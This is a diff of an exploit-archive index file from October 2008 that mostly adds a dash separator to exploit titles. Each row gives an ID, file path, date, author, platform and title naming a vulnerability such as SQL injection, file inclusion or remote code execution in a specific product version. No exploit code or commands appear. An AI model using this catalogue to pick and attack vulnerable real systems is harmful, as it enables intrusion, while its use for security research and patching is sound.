-6672,platforms/windows/dos/6672.txt,"AyeView 2.20 (invalid bitmap header parsing) Crash Exploit",2008-10-05,suN8Hclf,windows,dos,0 -6673,platforms/windows/dos/6673.txt,"FastStone Image Viewer 3.6 (malformed bmp image) Crash Exploit",2008-10-05,suN8Hclf,windows,dos,0 +6672,platforms/windows/dos/6672.txt,"AyeView 2.20 - (invalid bitmap header parsing) Crash Exploit",2008-10-05,suN8Hclf,windows,dos,0 +6673,platforms/windows/dos/6673.txt,"FastStone Image Viewer 3.6 - (malformed bmp image) Crash Exploit",2008-10-05,suN8Hclf,windows,dos,0 6674,platforms/php/webapps/6674.pl,"FOSS Gallery Public <= 1.0 - Arbitrary Upload / Information c99 Expoit",2008-10-05,JosS,php,webapps,0 -6675,platforms/php/webapps/6675.pl,"Galerie 3.2 (pic) WBB Lite Addon Blind SQL Injection Exploit",2008-10-05,J0hn.X3r,php,webapps,0 +6675,platforms/php/webapps/6675.pl,"Galerie 3.2 - (pic) WBB Lite Addon Blind SQL Injection Exploit",2008-10-05,J0hn.X3r,php,webapps,0 6676,platforms/php/webapps/6676.txt,"opennms < 1.5.96 - Multiple Vulnerabilities",2008-10-05,"BugSec LTD",php,webapps,0 -6677,platforms/php/webapps/6677.pl,"geccBBlite 2.0 (leggi.php id) Remote SQL Injection Exploit",2008-10-05,Piker,php,webapps,0 +6677,platforms/php/webapps/6677.pl,"geccBBlite 2.0 - (leggi.php id) Remote SQL Injection Exploit",2008-10-05,Piker,php,webapps,0 6678,platforms/php/webapps/6678.txt,"fastpublish CMS 1.9999 - (LFI/SQL) Multiple Vulnerabilities",2008-10-05,~!Dok_tOR!~,php,webapps,0 6679,platforms/php/webapps/6679.txt,"phpAbook <= 0.8.8b (COOKIE) Local File Inclusion",2008-10-05,JosS,php,webapps,0 6680,platforms/php/webapps/6680.txt,"FOSS Gallery Public <= 1.0 - Arbitrary File Upload Vulnerabilities",2008-10-05,Pepelux,php,webapps,0 @@ -6256,69 +6256,69 @@ id,file,description,date,author,platform,type,port 6684,platforms/php/webapps/6684.txt,"PHP-Fusion Mod triscoop_race_system - (raceid) SQL Injection",2008-10-05,boom3rang,php,webapps,0 6685,platforms/php/webapps/6685.txt,"asiCMS alpha 0.208 - Multiple Remote File Inclusion Vulnerabilities",2008-10-06,NoGe,php,webapps,0 6686,platforms/windows/remote/6686.txt,"hammer software metagauge 1.0.0.17 - Directory Traversal",2008-10-06,"Brad Antoniewicz",windows,remote,0 -6687,platforms/php/webapps/6687.pl,"Yerba SACphp <= 6.3 (mod) Local File Inclusion Exploit",2008-10-06,Pepelux,php,webapps,0 -6689,platforms/linux/dos/6689.txt,"Konqueror 3.5.9 (font color) Remote Crash",2008-10-06,"Jeremy Brown",linux,dos,0 +6687,platforms/php/webapps/6687.pl,"Yerba SACphp <= 6.3 - (mod) Local File Inclusion Exploit",2008-10-06,Pepelux,php,webapps,0 +6689,platforms/linux/dos/6689.txt,"Konqueror 3.5.9 - (font color) Remote Crash",2008-10-06,"Jeremy Brown",linux,dos,0 6690,platforms/windows/remote/6690.html,"Skype extension for Firefox BETA 2.2.0.95 Clipboard Writing",2008-10-07,irk4z,windows,remote,0 6691,platforms/php/webapps/6691.txt,"yerba sacphp <= 6.3 - Multiple Vulnerabilities",2008-10-07,StAkeR,php,webapps,0 6692,platforms/php/webapps/6692.txt,"Joomla Component com_hotspots (w) Remote SQL Injection",2008-10-07,cOndemned,php,webapps,0 -6693,platforms/php/webapps/6693.txt,"YourOwnBux 4.0 (COOKIE) Remote SQL Injection",2008-10-07,Tec-n0x,php,webapps,0 -6694,platforms/php/webapps/6694.txt,"PHP Realtor 1.5 (view_cat.php v_cat) Remote SQL Injection",2008-10-07,Mr.SQL,php,webapps,0 -6695,platforms/php/webapps/6695.txt,"PHP Auto Dealer 2.7 (view_cat.php v_cat) SQL Injection",2008-10-07,Mr.SQL,php,webapps,0 -6696,platforms/php/webapps/6696.txt,"PHP Autos 2.9.1 (searchresults.php catid) SQL Injection",2008-10-07,Mr.SQL,php,webapps,0 +6693,platforms/php/webapps/6693.txt,"YourOwnBux 4.0 - (COOKIE) Remote SQL Injection",2008-10-07,Tec-n0x,php,webapps,0 +6694,platforms/php/webapps/6694.txt,"PHP Realtor 1.5 - (view_cat.php v_cat) Remote SQL Injection",2008-10-07,Mr.SQL,php,webapps,0 +6695,platforms/php/webapps/6695.txt,"PHP Auto Dealer 2.7 - (view_cat.php v_cat) SQL Injection",2008-10-07,Mr.SQL,php,webapps,0 +6696,platforms/php/webapps/6696.txt,"PHP Autos 2.9.1 - (searchresults.php catid) SQL Injection",2008-10-07,Mr.SQL,php,webapps,0 6697,platforms/php/webapps/6697.txt,"Built2Go PHP RealEstate 1.5 - (event_detail.php) SQL Injection",2008-10-07,d3v1l,php,webapps,0 6698,platforms/php/webapps/6698.txt,"TorrentTrader Classic <= 1.04 - Blind SQL Injection",2008-10-07,BazOka-HaCkEr,php,webapps,0 6699,platforms/windows/remote/6699.html,"Microsoft PicturePusher ActiveX Cross-Site File Upload Attack PoC",2008-10-08,Nine:Situations:Group,windows,remote,0 6700,platforms/php/webapps/6700.txt,"DFF PHP Framework API (Data Feed File) - RFI Vulnerabilities",2008-10-08,GoLd_M,php,webapps,0 6701,platforms/php/webapps/6701.txt,"HispaH textlinksads (index.php) Remote SQL Injection",2008-10-08,InjEctOr5,php,webapps,0 -6702,platforms/php/webapps/6702.txt,"AdMan 1.1.20070907 (campaignId) SQL Injection",2008-10-08,SuB-ZeRo,php,webapps,0 +6702,platforms/php/webapps/6702.txt,"AdMan 1.1.20070907 - (campaignId) SQL Injection",2008-10-08,SuB-ZeRo,php,webapps,0 6703,platforms/php/webapps/6703.txt,"WebBiscuits Modules Controller <= 1.1 - (RFI/RFD) Remote Vulnerabilities",2008-10-08,GoLd_M,php,webapps,0 -6704,platforms/linux/dos/6704.txt,"Konqueror 3.5.9 (color/bgcolor) Multiple Remote Crash Vulnerabilities",2008-10-08,"Jeremy Brown",linux,dos,0 +6704,platforms/linux/dos/6704.txt,"Konqueror 3.5.9 - (color/bgcolor) Multiple Remote Crash Vulnerabilities",2008-10-08,"Jeremy Brown",linux,dos,0 6705,platforms/windows/local/6705.txt,"Microsoft Windows 2003 - Token Kidnapping Local Exploit PoC",2008-10-08,"Cesar Cerrudo",windows,local,0 6706,platforms/php/webapps/6706.php,"Kusaba <= 1.0.4 - Remote Code Execution Exploit",2008-10-09,Sausage,php,webapps,0 6707,platforms/php/webapps/6707.txt,"Gforge <= 4.5.19 - Multiple Remote SQL Injection Vulnerabilities",2008-10-09,beford,php,webapps,0 -6708,platforms/php/webapps/6708.txt,"Gforge <= 4.6 rc1 (skill_edit) SQL Injection",2008-10-09,beford,php,webapps,0 +6708,platforms/php/webapps/6708.txt,"Gforge <= 4.6 rc1 - (skill_edit) SQL Injection",2008-10-09,beford,php,webapps,0 6709,platforms/php/webapps/6709.txt,"Joomla Component Joomtracker 1.01 - Remote SQL Injection",2008-10-09,rsauron,php,webapps,0 6710,platforms/php/webapps/6710.txt,"camera life 2.6.2b4 - (SQL/XSS) Multiple Vulnerabilities",2008-10-09,BackDoor,php,webapps,0 6711,platforms/php/webapps/6711.htm,"Kusaba <= 1.0.4 - Remote Code Execution Exploit (2)",2008-10-09,Sausage,php,webapps,0 6712,platforms/php/webapps/6712.txt,"IranMC Arad Center (news.php id) SQL Injection",2008-10-09,"Hussin X",php,webapps,0 6713,platforms/php/webapps/6713.txt,"ScriptsEz Mini Hosting Panel (members.php) LFI",2008-10-09,JosS,php,webapps,0 -6714,platforms/php/webapps/6714.pl,"Stash 1.0.3 (SQL) User Credentials Disclosure Exploit",2008-10-09,gnix,php,webapps,0 +6714,platforms/php/webapps/6714.pl,"Stash 1.0.3 - (SQL) User Credentials Disclosure Exploit",2008-10-09,gnix,php,webapps,0 6715,platforms/php/webapps/6715.txt,"ScriptsEz Easy Image Downloader Local File Download",2008-10-09,JosS,php,webapps,0 6716,platforms/windows/dos/6716.pl,"Microsoft Windows GDI+ - Proof of Concept (MS08-052) (2)",2008-10-09,"John Smith",windows,dos,0 -6717,platforms/windows/dos/6717.py,"WinFTP 2.3.0 (PASV mode) Remote Denial of Service Exploit",2008-10-09,dmnt,windows,dos,0 -6718,platforms/linux/dos/6718.html,"Konqueror 3.5.9 (load) Remote Crash",2008-10-10,"Jeremy Brown",linux,dos,0 -6719,platforms/windows/dos/6719.py,"NoticeWare E-mail Server 5.1.2.2 (POP3) Pre-Auth DoS Exploit",2008-10-10,rAWjAW,windows,dos,0 +6717,platforms/windows/dos/6717.py,"WinFTP 2.3.0 - (PASV mode) Remote Denial of Service Exploit",2008-10-09,dmnt,windows,dos,0 +6718,platforms/linux/dos/6718.html,"Konqueror 3.5.9 - (load) Remote Crash",2008-10-10,"Jeremy Brown",linux,dos,0 +6719,platforms/windows/dos/6719.py,"NoticeWare E-mail Server 5.1.2.2 - (POP3) Pre-Auth DoS Exploit",2008-10-10,rAWjAW,windows,dos,0 6720,platforms/asp/webapps/6720.txt,"Ayco Okul Portali (linkid) SQL Injection (tr)",2008-10-10,Crackers_Child,asp,webapps,0 6721,platforms/php/webapps/6721.txt,"Easynet4u Forum Host (forum.php) SQL Injection",2008-10-10,SuB-ZeRo,php,webapps,0 6722,platforms/php/webapps/6722.txt,"Easynet4u faq Host (faq.php faq) Remote SQL Injection",2008-10-10,SuB-ZeRo,php,webapps,0 6723,platforms/php/webapps/6723.txt,"Joomla Component Ignite Gallery 0.8.3 - SQL Injection",2008-10-10,H!tm@N,php,webapps,0 6724,platforms/php/webapps/6724.txt,"Joomla Component mad4joomla SQL Injection",2008-10-10,H!tm@N,php,webapps,0 -6725,platforms/asp/webapps/6725.txt,"MunzurSoft Wep Portal W3 (kat) SQL Injection",2008-10-10,LUPUS,asp,webapps,0 +6725,platforms/asp/webapps/6725.txt,"MunzurSoft Wep Portal W3 - (kat) SQL Injection",2008-10-10,LUPUS,asp,webapps,0 6726,platforms/hardware/dos/6726.txt,"Nokia Mini Map Browser (array sort) Silent Crash",2008-10-10,ikki,hardware,dos,0 6728,platforms/php/webapps/6728.txt,"Easynet4u Link Host (cat_id) SQL Injection",2008-10-10,BeyazKurt,php,webapps,0 6729,platforms/php/webapps/6729.php,"SlimCMS <= 1.0.0 - (redirect.php) Privilege Escalation Exploit",2008-10-10,StAkeR,php,webapps,0 -6730,platforms/php/webapps/6730.txt,"Joomla Component ownbiblio 1.5.3 (catid) SQL Injection",2008-10-11,H!tm@N,php,webapps,0 +6730,platforms/php/webapps/6730.txt,"Joomla Component ownbiblio 1.5.3 - (catid) SQL Injection",2008-10-11,H!tm@N,php,webapps,0 6731,platforms/asp/webapps/6731.txt,"Absolute Poll Manager XE 4.1 - (xlacomments.asp) SQL Injection",2008-10-11,Hakxer,asp,webapps,0 6732,platforms/windows/dos/6732.txt,"Microsoft Windows - InternalOpenColorProfile Heap Overflow PoC (MS08-046)",2008-10-12,Ac!dDrop,windows,dos,0 6733,platforms/php/webapps/6733.txt,"mini-pub 0.3 - (LFD/CE) Multiple Vulnerabilities",2008-10-12,muuratsalo,php,webapps,0 6734,platforms/php/webapps/6734.txt,"mini-pub 0.3 - Local Directory Traversal / File Disclosure Vulnerabilities",2008-10-12,GoLd_M,php,webapps,0 6735,platforms/php/webapps/6735.php,"Globsy <= 1.0 - Remote File Rewriting Exploit",2008-10-12,StAkeR,php,webapps,0 -6736,platforms/php/webapps/6736.txt,"Real Estate Scripts 2008 (index.php cat) SQL Injection",2008-10-12,Hakxer,php,webapps,0 -6737,platforms/php/webapps/6737.txt,"LokiCMS <= 0.3.4 (index.php page) Arbitrary Check File Exploit",2008-10-12,JosS,php,webapps,0 +6736,platforms/php/webapps/6736.txt,"Real Estate Scripts 2008 - (index.php cat) SQL Injection",2008-10-12,Hakxer,php,webapps,0 +6737,platforms/php/webapps/6737.txt,"LokiCMS <= 0.3.4 - (index.php page) Arbitrary Check File Exploit",2008-10-12,JosS,php,webapps,0 6738,platforms/windows/dos/6738.py,"GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption PoC/DoS Exploit",2008-10-12,dmnt,windows,dos,0 6739,platforms/php/webapps/6739.txt,"NewLife Blogger <= 3.0 - Insecure Cookie Handling / SQL Injection",2008-10-12,Pepelux,php,webapps,0 -6740,platforms/php/webapps/6740.txt,"My PHP Indexer 1.0 (index.php) Local File Download",2008-10-12,JosS,php,webapps,0 +6740,platforms/php/webapps/6740.txt,"My PHP Indexer 1.0 - (index.php) Local File Download",2008-10-12,JosS,php,webapps,0 6741,platforms/windows/dos/6741.py,"XM Easy Personal FTP Server 5.6.0 - Remote Denial of Service Exploit",2008-10-13,shinnai,windows,dos,0 6742,platforms/windows/dos/6742.py,"RaidenFTPD 2.4 build 3620 - Remote Denial of Service Exploit",2008-10-13,dmnt,windows,dos,0 6743,platforms/php/webapps/6743.pl,"LokiCMS 0.3.4 writeconfig() Remote Command Execution Exploit",2008-10-13,girex,php,webapps,0 -6744,platforms/php/webapps/6744.txt,"LokiCMS 0.3.4 (admin.php) Create Local File Inclusion Exploit",2008-10-13,JosS,php,webapps,0 +6744,platforms/php/webapps/6744.txt,"LokiCMS 0.3.4 - (admin.php) Create Local File Inclusion Exploit",2008-10-13,JosS,php,webapps,0 6745,platforms/php/webapps/6745.txt,"ParsBlogger (links.asp id) Remote SQL Injection",2008-10-13,"Hussin X",php,webapps,0 -6746,platforms/php/webapps/6746.txt,"IndexScript 3.0 (sug_cat.php parent_id) SQL Injection",2008-10-13,d3v1l,php,webapps,0 +6746,platforms/php/webapps/6746.txt,"IndexScript 3.0 - (sug_cat.php parent_id) SQL Injection",2008-10-13,d3v1l,php,webapps,0 6747,platforms/php/webapps/6747.php,"WP Comment Remix 1.4.3 - Remote SQL Injection Exploit",2008-10-14,g30rg3_x,php,webapps,0 6748,platforms/php/webapps/6748.txt,"XOOPS Module xhresim - (index.php no) Remote SQL Injection",2008-10-14,EcHoLL,php,webapps,0 6749,platforms/php/webapps/6749.php,"Nuked-klaN <= 1.7.7 / <= SP4.4 - Multiple Vulnerabilities",2008-10-14,"Charles Fol",php,webapps,0 6750,platforms/hardware/remote/6750.txt,"Telecom Italia Alice Pirelli routers Backdoor from internal LAN/WAN",2008-10-14,"saxdax & drpepperONE",hardware,remote,0 -6751,platforms/php/webapps/6751.txt,"SezHoo 0.1 (IP) Remote File Inclusion",2008-10-14,DaRkLiFe,php,webapps,0 +6751,platforms/php/webapps/6751.txt,"SezHoo 0.1 - (IP) Remote File Inclusion",2008-10-14,DaRkLiFe,php,webapps,0 6752,platforms/windows/dos/6752.pl,"Eserv 3.x FTP Server (ABOR) Remote Stack Overflow PoC",2008-10-14,LiquidWorm,windows,dos,0 6753,platforms/windows/dos/6753.py,"Titan FTP server 6.26 build 630 - Remote Denial of Service Exploit",2008-10-14,dmnt,windows,dos,0 6754,platforms/php/webapps/6754.txt,"My PHP Dating (success_story.php id) SQL Injection",2008-10-14,Hakxer,php,webapps,0 @@ -6327,7 +6327,7 @@ id,file,description,date,author,platform,type,port 6757,platforms/windows/local/6757.txt,"Microsoft Windows 2003/XP - afd.sys Privilege Escalation Exploit (K-plugin)",2008-10-15,"Ruben Santamarta ",windows,local,0 6758,platforms/php/webapps/6758.txt,"AstroSPACES (id) Remote SQL Injection",2008-10-15,TurkishWarriorr,php,webapps,0 6759,platforms/php/webapps/6759.txt,"mystats - (hits.php) Multiple Vulnerabilities",2008-10-15,JosS,php,webapps,0 -6760,platforms/php/webapps/6760.txt,"myEvent 1.6 (viewevent.php) Remote SQL Injection",2008-10-15,JosS,php,webapps,0 +6760,platforms/php/webapps/6760.txt,"myEvent 1.6 - (viewevent.php) Remote SQL Injection",2008-10-15,JosS,php,webapps,0 6761,platforms/windows/dos/6761.html,"Hummingbird <= 13.0 - ActiveX Remote Buffer Overflow PoC",2008-10-16,"Thomas Pollet",windows,dos,0 6762,platforms/php/webapps/6762.txt,"CafeEngine Multiple Remote SQL Injection Vulnerabilities",2008-10-16,0xFFFFFF,php,webapps,0 6763,platforms/php/webapps/6763.txt,"Mosaic Commerce (category.php cid) SQL Injection",2008-10-16,"Ali Abbasi",php,webapps,0 @@ -6336,10 +6336,10 @@ id,file,description,date,author,platform,type,port 6766,platforms/php/webapps/6766.txt,"PokerMax Poker League Insecure Cookie Handling",2008-10-16,DaRkLiFe,php,webapps,0 6767,platforms/php/webapps/6767.txt,"Kure 0.6.3 - (index.php post & doc) Local File Inclusion",2008-10-16,JosS,php,webapps,0 6768,platforms/php/webapps/6768.txt,"Mantis Bug Tracker <= 1.1.3 - Remote Code Execution Exploit",2008-10-16,EgiX,php,webapps,0 -6769,platforms/php/webapps/6769.pl,"iGaming CMS 2.0 Alpha 1 (search.php) Remote SQL Injection Exploit",2008-10-16,StAkeR,php,webapps,0 +6769,platforms/php/webapps/6769.pl,"iGaming CMS 2.0 Alpha 1 - (search.php) Remote SQL Injection Exploit",2008-10-16,StAkeR,php,webapps,0 6770,platforms/php/webapps/6770.txt,"PHP Easy Downloader 1.5 - (file) File Disclosure",2008-10-16,LMaster,php,webapps,0 6771,platforms/cgi/webapps/6771.txt,"Calendars for the Web 4.02 Admin Auth Bypass",2008-10-16,SecVuln,cgi,webapps,0 -6772,platforms/php/webapps/6772.txt,"Post Affiliate Pro 2.0 (index.php md) Local File Inclusion",2008-10-16,ZeN,php,webapps,0 +6772,platforms/php/webapps/6772.txt,"Post Affiliate Pro 2.0 - (index.php md) Local File Inclusion",2008-10-16,ZeN,php,webapps,0 6773,platforms/windows/remote/6773.html,"Hummingbird Deployment Wizard 2008 - ActiveX Command Execution",2008-10-17,shinnai,windows,remote,0 6774,platforms/windows/remote/6774.html,"Hummingbird Deployment Wizard 2008 Registry Values Creation/Change",2008-10-17,shinnai,windows,remote,0 6775,platforms/solaris/dos/6775.c,"Solaris 9 PortBind XDR-DECODE taddr2uaddr() Remote DoS Exploit",2008-10-17,"Federico L. Bossi Bonin",solaris,dos,0 @@ -6349,15 +6349,15 @@ id,file,description,date,author,platform,type,port 6779,platforms/php/webapps/6779.txt,"phpFastNews 1.0.0 Insecure Cookie Handling",2008-10-18,Qabandi,php,webapps,0 6780,platforms/php/webapps/6780.txt,"zeeproperty (adid) Remote SQL Injection",2008-10-18,"Hussin X",php,webapps,0 6781,platforms/php/webapps/6781.pl,"Meeting Room Booking System (MRBS) < 1.4 - SQL Injection Exploit",2008-10-18,Xianur0,php,webapps,0 -6782,platforms/php/webapps/6782.php,"miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit",2008-10-18,StAkeR,php,webapps,0 +6782,platforms/php/webapps/6782.php,"miniBloggie 1.0 - (del.php) Remote Blind SQL Injection Exploit",2008-10-18,StAkeR,php,webapps,0 6783,platforms/php/webapps/6783.php,"Nuke ET <= 3.4 - (fckeditor) Remote Arbitrary File Upload Exploit",2008-10-18,EgiX,php,webapps,0 6784,platforms/php/webapps/6784.pl,"PHP Easy Downloader <= 1.5 - Remote File Creation Exploit",2008-10-18,StAkeR,php,webapps,0 6785,platforms/php/webapps/6785.txt,"Fast Click SQL 1.1.7 Lite (init.php) Remote File Inclusion",2008-10-19,NoGe,php,webapps,0 6786,platforms/solaris/remote/6786.pl,"Solaris 9 - [UltraSPARC] sadmind Remote Root Exploit",2008-10-19,kingcope,solaris,remote,111 6787,platforms/windows/local/6787.pl,"BitTorrent 6.0.3 - (.torrent) Stack Buffer Overflow Exploit",2008-10-19,"Guido Landi",windows,local,0 -6788,platforms/php/webapps/6788.txt,"yappa-ng <= 2.3.3-beta0 (album) Local File Inclusion",2008-10-19,Vrs-hCk,php,webapps,0 +6788,platforms/php/webapps/6788.txt,"yappa-ng <= 2.3.3-beta0 - (album) Local File Inclusion",2008-10-19,Vrs-hCk,php,webapps,0 6789,platforms/php/webapps/6789.pl,"Vivvo CMS <= 3.4 - Multiple Vulnerabilities",2008-10-19,Xianur0,php,webapps,0 -6790,platforms/php/webapps/6790.py,"WBB Plugin rGallery 1.09 (itemID) Blind SQL Injection Exploit",2008-10-20,Five-Three-Nine,php,webapps,0 +6790,platforms/php/webapps/6790.py,"WBB Plugin rGallery 1.09 - (itemID) Blind SQL Injection Exploit",2008-10-20,Five-Three-Nine,php,webapps,0 6791,platforms/php/webapps/6791.pl,"e107 <= 0.7.13 - (usersettings.php) Blind SQL Injection Exploit",2008-10-19,girex,php,webapps,0 6792,platforms/php/webapps/6792.txt,"Joomla Component ds-syndicate (feed_id) SQL Injection",2008-10-20,boom3rang,php,webapps,0 6793,platforms/windows/remote/6793.html,"Dart Communications PowerTCP FTP module Remote BoF Exploit",2008-10-20,InTeL,windows,remote,0 @@ -6365,14 +6365,14 @@ id,file,description,date,author,platform,type,port 6796,platforms/php/webapps/6796.txt,"Limbo CMS - (Private Messaging Component) SQL Injection",2008-10-21,StAkeR,php,webapps,0 6797,platforms/php/webapps/6797.txt,"LightBlog 9.8 - (GET & POST & COOKIE) Multiple LFI Vulnerabilities",2008-10-21,JosS,php,webapps,0 6798,platforms/windows/local/6798.pl,"VLC Media Player TY File Stack Based Buffer Overflow Exploit",2008-10-21,"Guido Landi",windows,local,0 -6799,platforms/php/webapps/6799.txt,"ShopMaker 1.0 (product.php id) Remote SQL Injection",2008-10-21,"Hussin X",php,webapps,0 +6799,platforms/php/webapps/6799.txt,"ShopMaker 1.0 - (product.php id) Remote SQL Injection",2008-10-21,"Hussin X",php,webapps,0 6800,platforms/windows/dos/6800.pl,"freeSSHd 1.2.1 - sftp rename Remote Buffer Overflow PoC (Auth)",2008-10-22,"Jeremy Brown",windows,dos,0 6801,platforms/windows/remote/6801.txt,"Opera <= 9.60 Stored Cross-Site Scripting",2008-10-22,"Roberto Suggi Liverani",windows,remote,0 6802,platforms/php/webapps/6802.txt,"Joomla Component Daily Message 1.0.3 - (id) SQL Injection",2008-10-22,H!tm@N,php,webapps,0 6803,platforms/php/webapps/6803.txt,"Iamma Simple Gallery 1.0/2.0 - Arbitrary File Upload",2008-10-22,x0r,php,webapps,0 6804,platforms/windows/remote/6804.pl,"GoodTech SSH (SSH_FXP_OPEN) Remote Buffer Overflow Exploit",2008-10-22,r0ut3r,windows,remote,22 6805,platforms/multiple/dos/6805.txt,"LibSPF2 < 1.2.8 DNS TXT Record Parsing Bug Heap Overflow PoC",2008-10-22,"Dan Kaminsky",multiple,dos,0 -6806,platforms/php/webapps/6806.txt,"phpcrs <= 2.06 (importFunction) Local File Inclusion",2008-10-22,Pepelux,php,webapps,0 +6806,platforms/php/webapps/6806.txt,"phpcrs <= 2.06 - (importFunction) Local File Inclusion",2008-10-22,Pepelux,php,webapps,0 6808,platforms/php/webapps/6808.pl,"LoudBlog <= 0.8.0a - (ajax.php) SQL Injection (Auth)",2008-10-22,Xianur0,php,webapps,0 6809,platforms/php/webapps/6809.txt,"Joomla Component ionFiles 4.4.2 File Disclosure",2008-10-22,Vrs-hCk,php,webapps,0 6810,platforms/asp/webapps/6810.txt,"DorsaCMS (ShowPage.aspx) Remote SQL Injection",2008-10-22,syst3m_f4ult,asp,webapps,0 @@ -6380,11 +6380,11 @@ id,file,description,date,author,platform,type,port 6812,platforms/windows/dos/6812.pl,"freeSSHd 1.2.1 - sftp realpath Remote Buffer Overflow PoC (Auth)",2008-10-22,"Jeremy Brown",windows,dos,0 6813,platforms/windows/remote/6813.html,"Opera 9.52/9.60 - Stored Cross-Site Scripting Code Execution PoC",2008-10-23,"Aviv Raff",windows,remote,0 6814,platforms/php/webapps/6814.php,"CSPartner 1.0 - (Delete All Users/SQL Injection) Remote Exploit",2008-10-23,StAkeR,php,webapps,0 -6815,platforms/windows/dos/6815.pl,"SilverSHielD 1.0.2.34 (opendir) Denial of Service Exploit",2008-10-23,"Jeremy Brown",windows,dos,0 +6815,platforms/windows/dos/6815.pl,"SilverSHielD 1.0.2.34 - (opendir) Denial of Service Exploit",2008-10-23,"Jeremy Brown",windows,dos,0 6816,platforms/php/webapps/6816.txt,"txtshop 1.0b (language) Local File Inclusion (win only)",2008-10-23,Pepelux,php,webapps,0 6817,platforms/php/webapps/6817.txt,"Joomla Component RWCards 3.0.11 - Local File Inclusion",2008-10-23,Vrs-hCk,php,webapps,0 6818,platforms/php/webapps/6818.txt,"aflog 1.01 - Multiple Insecure Cookie Handling Vulnerabilies",2008-10-23,JosS,php,webapps,0 -6819,platforms/php/webapps/6819.txt,"MindDezign Photo Gallery 2.2 (index.php id) SQL Injection",2008-10-23,"CWH Underground",php,webapps,0 +6819,platforms/php/webapps/6819.txt,"MindDezign Photo Gallery 2.2 - (index.php id) SQL Injection",2008-10-23,"CWH Underground",php,webapps,0 6820,platforms/php/webapps/6820.pl,"MindDezign Photo Gallery 2.2 - Arbitrary Add Admin Exploit",2008-10-23,"CWH Underground",php,webapps,0 6821,platforms/php/webapps/6821.txt,"miniPortail <= 2.2 - (XSS/LFI) Remote Vulnerabilities",2008-10-23,StAkeR,php,webapps,0 6822,platforms/php/webapps/6822.txt,"websvn <= 2.0 - (XSS/fh/CE) Multiple Vulnerabilities",2008-10-23,"GulfTech Security",php,webapps,0 @@ -6399,8 +6399,8 @@ id,file,description,date,author,platform,type,port 6831,platforms/windows/local/6831.cpp,"TUGzip 3.00 archiver - (.zip) Local Buffer Overflow Exploit",2008-10-24,"fl0 fl0w",windows,local,0 6832,platforms/windows/dos/6832.html,"KVIrc 3.4.0 Virgo Remote Format String Exploit PoC",2008-10-24,LiquidWorm,windows,dos,0 6833,platforms/php/webapps/6833.txt,"phpdaily - (SQL/XSS/lfd) Multiple Vulnerabilities",2008-10-24,0xFFFFFF,php,webapps,0 -6834,platforms/windows/dos/6834.c,"vicFTP 5.0 (LIST) Remote Denial of Service Exploit",2008-10-24,"Alfons Luja",windows,dos,0 -6835,platforms/php/webapps/6835.txt,"BuzzyWall 1.3.1 (download id) Remote File Disclosure",2008-10-24,b3hz4d,php,webapps,0 +6834,platforms/windows/dos/6834.c,"vicFTP 5.0 - (LIST) Remote Denial of Service Exploit",2008-10-24,"Alfons Luja",windows,dos,0 +6835,platforms/php/webapps/6835.txt,"BuzzyWall 1.3.1 - (download id) Remote File Disclosure",2008-10-24,b3hz4d,php,webapps,0 6836,platforms/php/webapps/6836.txt,"Tlnews 2.2 Insecure Cookie Handling",2008-10-25,x0r,php,webapps,0 6837,platforms/php/webapps/6837.txt,"Kasra CMS (index.php) Multiple SQL Injection Vulnerabilities",2008-10-25,G4N0K,php,webapps,0 6838,platforms/windows/dos/6838.rb,"PumpKIN TFTP Server 2.7.2.0 - Denial of Service Exploit (Metasploit)",2008-10-25,"Saint Patrick",windows,dos,0 @@ -6409,17 +6409,17 @@ id,file,description,date,author,platform,type,port 6841,platforms/windows/remote/6841.txt,"Microsoft Windows Server - Code Execution Exploit (MS08-067) (Universal)",2008-10-26,EMM,windows,remote,135 6842,platforms/php/webapps/6842.txt,"WordPress Media Holder - (mediaHolder.php id) SQL Injection",2008-10-26,boom3rang,php,webapps,0 6843,platforms/php/webapps/6843.txt,"SFS Ez Forum (forum.php id) SQL Injection",2008-10-26,Hurley,php,webapps,0 -6844,platforms/php/webapps/6844.pl,"MyForum 1.3 (lecture.php id) Remote SQL Injection Exploit",2008-10-26,Vrs-hCk,php,webapps,0 +6844,platforms/php/webapps/6844.pl,"MyForum 1.3 - (lecture.php id) Remote SQL Injection Exploit",2008-10-26,Vrs-hCk,php,webapps,0 6845,platforms/cgi/webapps/6845.txt,"Ads Pro (dhtml.pl page) Remote Command Execution Exploit",2008-10-26,S0l1D,cgi,webapps,0 -6846,platforms/php/webapps/6846.txt,"MyForum 1.3 (padmin) Local File Inclusion",2008-10-27,Vrs-hCk,php,webapps,0 +6846,platforms/php/webapps/6846.txt,"MyForum 1.3 - (padmin) Local File Inclusion",2008-10-27,Vrs-hCk,php,webapps,0 6847,platforms/php/webapps/6847.txt,"Persia BME E-Catalogue Remote SQL Injection",2008-10-27,BugReport.IR,php,webapps,0 6848,platforms/php/webapps/6848.txt,"TlAds 1.0 - Remote Insecure Cookie Handling",2008-10-27,x0r,php,webapps,0 6849,platforms/php/webapps/6849.txt,"e107 Plugin alternate_profiles (id) SQL Injection",2008-10-27,boom3rang,php,webapps,0 -6850,platforms/php/webapps/6850.txt,"MyKtools 2.4 (langage) Local File Inclusion",2008-10-27,x0r,php,webapps,0 +6850,platforms/php/webapps/6850.txt,"MyKtools 2.4 - (langage) Local File Inclusion",2008-10-27,x0r,php,webapps,0 6851,platforms/linux/local/6851.c,"Linux Kernel < 2.6.22 - ftruncate()/open() Local Exploit",2008-10-27,gat3way,linux,local,0 6852,platforms/php/webapps/6852.pl,"e107 Plugin EasyShop (category_id) Blind SQL Injection Exploit",2008-10-27,StAkeR,php,webapps,0 6853,platforms/php/webapps/6853.txt,"questcms - (XSS/Directory Traversal/SQL) Multiple Vulnerabilities",2008-10-27,d3b4g,php,webapps,0 -6854,platforms/php/webapps/6854.txt,"Aiocp 1.4 (poll_id) Remote SQL Injection",2008-10-27,ExSploiters,php,webapps,0 +6854,platforms/php/webapps/6854.txt,"Aiocp 1.4 - (poll_id) Remote SQL Injection",2008-10-27,ExSploiters,php,webapps,0 6855,platforms/php/webapps/6855.txt,"MyKtools 2.4 - Arbitrary Database Backup",2008-10-27,Stack,php,webapps,0 6856,platforms/php/webapps/6856.txt,"e107 Plugin BLOG Engine 2.1.4 - Remote SQL Injection",2008-10-28,ZoRLu,php,webapps,0 6857,platforms/php/webapps/6857.txt,"MyForum 1.3 Insecure Cookie Handling",2008-10-28,Stack,php,webapps,0 @@ -6429,7 +6429,7 @@ id,file,description,date,author,platform,type,port 6861,platforms/php/webapps/6861.pl,"H2O-CMS <= 3.4 - Remote Command Execution Exploit (mq = 